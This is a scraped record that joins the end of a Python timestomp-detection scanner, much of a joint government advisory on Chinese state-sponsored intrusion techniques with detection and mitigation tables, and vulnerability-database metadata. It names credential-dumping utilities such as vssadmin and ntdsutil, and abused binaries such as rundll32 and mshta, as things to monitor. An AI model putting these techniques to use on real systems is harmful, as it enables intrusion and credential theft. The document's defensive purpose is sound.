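    return "ok", reasons


def scan_directory(root, **kw):
    """Map each regular file under root (relative path) to its verdict and reasons."""
    out = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            if os.path.isfile(p) and not os.path.islink(p):
                out[os.path.relpath(p, root)] = inspect(p, **kw)
    return out


def demo():
    """Constructed directory: one normal file, one timestomped, one archive-style."""
    root = tempfile.mkdtemp()
    try:
        normal, stomped, extracted = (os.path.join(root, n)
                                      for n in ("report.txt", "update.exe", "lib.so"))
        for p in (normal, stomped, extracted):
            with open(p, "wb") as f:
                f.write(b"constructed sample content")
        old = 1420070400                                          # 2015-01-01T00:00:00Z
        os.utime(stomped, (old, old))                             # what `touch -t 201501010000` does
        os.utime(extracted, ns=(old * 10**9 + 123456789,) * 2)    # tar/unzip restoring a precise mtime
        return scan_directory(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, (verdict, reasons) in sorted(demo().items()):
        print(f"{name}: {verdict} {reasons}")
```

Run against a real web root or `System32` with a list of previously recorded timestamps, the `review` class is where the original file handle correlation the advisory describes comes in: a file whose mtime went backwards between two scans was rewritten, whatever its timestamps claim.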
\n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed 
using Microsoft-signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., `rundll32.exe`, `mshta.exe`) and look for anomalous activity that does not follow the historically benign arguments and loaded DLLs associated with invocation of the binary (for example, `rundll32.exe` loading a DLL from a user-writable path, or `mshta.exe` fetching a remote URL).\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors’ Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\n * LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] 
\n * NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or the Active Directory database (`NTDS.dit`) for credential dumping.\n\n| \n\n * Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy `NTDS.dit`. Because the file is locked while the directory service is running, actors typically obtain it through a Volume Shadow Copy (`vssadmin`, `diskshadow`) or `ntdsutil` media creation (`ifm`), so monitor those utilities on domain controllers as well.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect LSA secrets from credential dumping on Windows 10. It is not enabled by default and has hardware and firmware prerequisites (virtualization-based security on a 64-bit CPU with virtualization extensions, UEFI, and Secure Boot). 
\n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. 
WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. 
Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. 
\n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and 
Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used 
compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. 
excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) 
to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary 
malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. 
\n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). 
Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. 
Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). 
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).

For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>).

Media Inquiries / Press Desk:

 * NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>)
 * CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>)
 * FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)

### References

[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)

### Revisions

July 19, 2021: Initial Version
"https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering", "https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps", "http://www.fbi.gov/contact-us/field", "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "https://www.facebook.com/CISA", "https://twitter.com/CISAgov", "https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/accessibility", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2023-27350"], "immutableFields": [], "lastseen": "2023-06-02T15:02:33", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:DCC49204-DEDF-4481-A2E0-9147642F76FB", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876"]}, {"type": "avleonov", "idList": ["AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "cert", "idList": ["VU:290915", "VU:619785", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1097", "CPAI-2019-1653", "CPAI-2020-0628"]}, {"type": "cisa", "idList": 
["CISA:134C272F26FB005321448C648224EB02", "CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2020-5902", "CISA-KEV-CVE-2023-27350"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2023-27350"]}, {"type": "dsquare", "idList": ["E-688", "E-709"]}, {"type": "exploitdb", "idList": ["EDB-ID:47297", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48642", "EDB-ID:48711", "EDB-ID:51391", "EDB-ID:51452"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "059DC199-E425-50EE-B5F5-E351E0323E69", "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0D1A0CBD-B470-5537-BFD1-5E5CC1B66E90", "0F7F6A38-032A-59F3-8E3F-87CF2FA843FE", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", 
"1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D3AD059-4772-527B-A78C-724AFA1B109F", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "31DB22CD-3492-524F-9D26-035FC1086A71", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49D58681-03E3-5607-8475-366F990C3706", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", 